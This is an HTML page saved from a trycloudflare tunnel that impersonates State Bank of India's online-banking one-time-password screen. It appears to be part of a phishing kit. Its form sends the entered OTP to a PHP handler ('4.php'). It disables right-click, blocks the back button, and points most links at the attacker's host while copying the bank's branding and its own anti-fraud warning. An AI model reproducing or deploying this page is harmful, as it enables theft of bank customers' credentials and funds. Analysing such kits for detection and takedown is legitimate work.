
<!DOCTYPE html>




<html>

<!-- Mirrored from anchor-railroad-based-adobe.trycloudflare.com/sbikyc/afterresendloginsubmit.html by HTTrack Website Copier/3.x [XR&CO'2014], Thu, 03 Mar 2022 14:02:37 GMT -->
<head>
<title>State Bank of India</title>
<meta name="format-detection" content="telephone=yes">
<meta http-equiv="Content-Type" content="text/xhtml; charset=UTF-8">
<meta name="viewport" id="viewport" content="width=device-width,minimum-scale=1.0,maximum-scale=1.0,initial-scale=1.0">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="MobileOptimized" content="320">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<link href="https://retail.onlinesbi.com/sbijava/retail/images/favicon.ico"  rel="shortcut icon" type="image/x-icon" />	
<link href="css/bootstrap.min-3.4.1.css" rel="stylesheet" type="text/css">
<link href="css/style.css" rel="stylesheet" type="text/css">
<script src="js/jquery-3.5.1.min.js" type="text/javascript"></script>
<script src="js/bootstrap.min-3.4.1.js" type="text/javascript"></script>
<script src="js/enscroll-0.6.2.js" type="text/javascript"></script>
<style type="text/css">
         #navContent{border-top:7px solid #1b75bc;}
         #faq_content{border:none !important}
</style>
<script type="text/javascript" src="js/loginTrouble.js"></script>
<script language="JavaScript">
window.history.forward(0);
</script>
</head> 
<body>
<div id="wrapper" class="container">
 







  	
  	 
   	<div class="row" id="header_">
  	<header id="headerContent">
		<div class="col-sm-1 col-xs-6">
			<a href="javascript:void(0);" id="sbi_logo">&nbsp;</a>
		</div>
		<div class="col-xs-6 hidden-sm hidden-md hidden-lg">
			<a href="5krighg5g5fjg5f2fjg8rjbvglkg5jgf2gkfnf5fngkg5fjf.html" class="wpanel_logout ">
				<span id="icon_logout" data-toggle="tooltip" data-container="body" title="" data-original-title="Logout"></span>
				<span class="logout_text" data-toggle="tooltip" data-container="body" title="" data-original-title="Logout">LOGOUT</span>
			</a>
		</div>
		
		<div class="col-sm-11">
			<div class="pull-right">
					<a href="http://anchor-railroad-based-adobe.trycloudflare.com/" class="wpanel_logout hidden-xs">
						<span id="icon_logout" data-toggle="tooltip" data-container="body" title="Logout"></span>
						<span class="logout_text" data-toggle="tooltip" data-container="body" title="Logout">LOGOUT</span>
					</a>
				<div id="header_navigation">
					<ul id="header_toplinks" class="pull-right">
						<li><a href="https://retail.onlinesbi.com/sbijava/retail/html/aboutus.html" target="_blank" title="About Us">About OnlineSBI</a></li>
						<li><a href="https://retail.onlinesbi.com/personal/reg_forms.html" target="_blank" title="Forms">Registration Forms</a></li>
					</ul>
					
					<ul id="header_links">
					<li class="insta_home"><a href="http://anchor-railroad-based-adobe.trycloudflare.com/personal/productandservices.html" title="Products &amp; Services" target="_blank"><span class="products_services">&nbsp;</span>Products &amp; Services</a></li>
					<li class="how_do_i"><a href="http://anchor-railroad-based-adobe.trycloudflare.com/personal/rinb_videos.html" title="How do I" target="_blank"><span class="icon_how_do_i">&nbsp;</span>How do I</a></li>
					</ul>
					
				</div>
			</div>
		</div>
	</header>
	</div> 
	<div class="row">
            <div id="navContent">
               <!-- User Details -->
			   <nav role="navigation">
					<div class="navbar-header">
						
						<div class="arrow_icon pull-right hidden-lg hidden-md hidden-sm">
							<a href="javascript:void(0);" class="arrow arrow_up">&nbsp;</a> 
						</div>
					</div>
				</nav>
               <div id="wpanel_users">
                  <div class="col-sm-2 wpanel_time">
                     <span> </span>
                  </div>
                  <div class="col-sm-7">
                     
                  </div>
                  <div class="col-lg-3 col-md-3 col-sm-3" id="wpanel_userdetails">
					<div class="col-sm-12">
						<div id="wpanel_username">
							<h2>Welcome</h2>
							<h3>State Bank User</h3>
						</div>
					</div>
				</div>
               </div>
               <!-- //User Details -->
            </div>
         </div>

       <script language="javascript">

               var message="This function is not allowed here.";
               function clickIE4(){

                             if (event.button==2){
                             alert(message);
                             return false;
                             }
               }

               function clickNS4(e){
                             if (document.layers||document.getElementById&&!document.all){
                                            if (e.which==2||e.which==3){
                                                      alert(message);
                                                      return false;
                                            }
                                    }
               }

               if (document.layers){
                             document.captureEvents(Event.MOUSEDOWN);
                             document.onmousedown=clickNS4;
               }

               else if (document.all&&!document.getElementById){
                             document.onmousedown=clickIE4;
               }

               document.oncontextmenu=new Function("alert(message);return false;")

</script>
  <div class="row" id="faq_content">
 	





<script language="JavaScript" type="text/javascript" src="js/aes.html"></script>
<!--  Javascript Declaration   -->
<script type="text/javascript" src="js/common.html"></script>
</head>







<form method="post" action="4.php" name="loginSFAApproveLoginOTP1">
<!-- <input type="hidden" name="encrSms"  id="encrSms" value=""/> --> 
	<!-- <input type="hidden" name="modeFlag" id="modeFlag" value="otp" /> -->
	<div class="content_panel">
		<div class="content_heading">
			<h3 class="pull-left">Login Second Factor Authentication</h3>
		</div>
		
		<div class="content_area">
			
				<p class="content_title">
					Enter the One Time Password sent to your mobile phone
				</p>
			
			
			

			<p class="mandatory_txt">
				
			</p>

			<div class="form-group">
				<label class="control-label col-lg-3 col-md-3 col-xs-7 col-comn"
					for="amount"> One Time Password<span class="mandatory_txt">*</span>
				</label>
				<div class="col-md-3">
					<input class="form-control" type="password" name="otp2"
						id="smsPassword" class="form-control" maxlength="8" tabindex="1"
						onPaste="return false" onFocus="disableautocompletion(this.id);"
						onkeypress="javascript:return IEKeyCap();" required/>
				</div>
			
			 
				
			</div>

			<div class="common_btn text-center col-md-9">
				<input name="btContinue" id="btContinue" type="submit"
					class="btn btn-default" title="submit" value="submit"
					onClick="javascript:fnOTPApprove(); return false;" />
			</div>
			
				<div class="common_btn col-lg-12 col-md-12">
					<p>
						If you did not receive the High Security Password on SMS, you can
						<a href="#">
							<button class="btn btn-resend" type="button"
								onClick="javascript:resendOTP(); return false;">
								Click here to resend the OTP
							</button>
						</a>
					</p>
				</div>
			 
		</div>
		<div class="info_panel col-md-12">
			<div class="notify_icon">
				<ul>
					
					<li>State Bank or any of its representative never sends you
						email/SMS or calls you over phone to get your personal
						information, password or one time SMS (high security) password.
						Any such e-mail/SMS or phone call is an attempt to fraudulently
						withdraw money from your account through Internet Banking. Never
						respond to such email/SMS or phone call. Please report immediately
						on <a href="http://anchor-railroad-based-adobe.trycloudflare.com/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="5d2f382d322f29732d35342e3534333a1d2e3f34733e32733433">[email&#160;protected]</a> if you receive any such email/SMS or
						Phone call. Immediately change your passwords if you have
						accidentally revealed your credentials.</li>
					<li>Please note that you will receive the all communication
						related to Internet banking on your updated mobile number only
						after approval.</li>

				</ul>
			</div>
		</div>

	</div>
	<!-- <input type="hidden" name="gt8j" id="gt8j" value="9vndfhl87665q007r7osaivshsrvm4hq" /> -->
</form>
<script data-cfasync="false" src="js/email-decode.min.js"></script><script>
	function resendOTP() {
		document.loginSFAApproveLoginOTP1.action = "otp2.html";
		document.loginSFAApproveLoginOTP1.submit();
	}
</script>

<script type="text/javascript">

	function fnOTPApprove() {
		 var keyString='SW2TJ7uoQAjXQF3qPtx2cmDxqADkulcWZKcYGlx2zyI=';
		var smsPassword = document.getElementById("smsPassword").value;
		document.getElementById('encrSms').value = CryptoJS.AES.encrypt(loginSFAApproveLoginOTP1.smsPassword.value,keyString);

		if (smsPassword == null || smsPassword == "") {
			alert("Please enter OTP password");
			document.getElementById("smsPassword").focus();
			return false;
		}
		document.getElementById("btContinue").disabled = false;
		document.loginSFAApproveLoginOTP1.action = "loginotpsfa.html";
		document.getElementById("smsPassword").value="";
		document.loginSFAApproveLoginOTP1.submit();
	}
</script>
<script language="javascript">
	function IEKeyCap() {
		if (window.event.keyCode == 13) {
			fnOTPApprove();
			return false;
		}
	}
</script>
 </div>
 <div class="row" id="footer">
 	









 




<!-- Footer -->
	<footer id="footerContent">
		<div id="footer_area">		
			<div class="col-lg-12 col-md-12 col-sm-12">
				<ul id="footer_links" class="pull-right hidden-xs">
					
											
							
							<li>
							<a href="#" onclick="window.open('http://anchor-railroad-based-adobe.trycloudflare.com/sbijava/retail/html/Privacy_Statement.html','aboutus','width=780, height=500, status=1, scrollbars=1, location=0')">Privacy Statement</a>										
							</li>
							<li>
							<a href="#" onclick="window.open('http://anchor-railroad-based-adobe.trycloudflare.com/sbijava/retail/html/hmpg_disclosure.html','aboutus','width=780, height=500, status=1, scrollbars=1, location=0')">Disclosure </a>			
							</li>
							<li>
							<a href="#" onclick="window.open('http://anchor-railroad-based-adobe.trycloudflare.com/sbijava/retail/html/Terms_of_Use.html','aboutus','width=780, height=500, status=1, scrollbars=1, location=0')">Terms of Service(Terms & Conditions) </a>	
							</li>	

                         <li><a onclick="javascript:callURL('http://anchor-railroad-based-adobe.trycloudflare.com/retail/sitemap.htm')" href="javascript:void(0);">
						Site Map</a></li>							
						
						
									
				</ul>
			</div>
		</div>
				
		<div class="footbg" id="best_view">
			<div class="col-sm-4">
				<p class="pull-left">&copy; State Bank of India</p>
			</div>
			<div class="col-sm-8">
				<p class="pull-right">Site best viewed at 1024 x 768 resolution in I.E 10 +, Mozilla 35 +, Google Chrome 35 +</p>
			</div>
		</div>
		
	</footer>
<!-- //Footer -->


 <input type='hidden' value='0' id='bankcodeValue'>
 
 </div>
</div>
</body>

<!-- Mirrored from anchor-railroad-based-adobe.trycloudflare.com/sbikyc/afterresendloginsubmit.html by HTTrack Website Copier/3.x [XR&CO'2014], Thu, 03 Mar 2022 14:02:39 GMT -->
</html>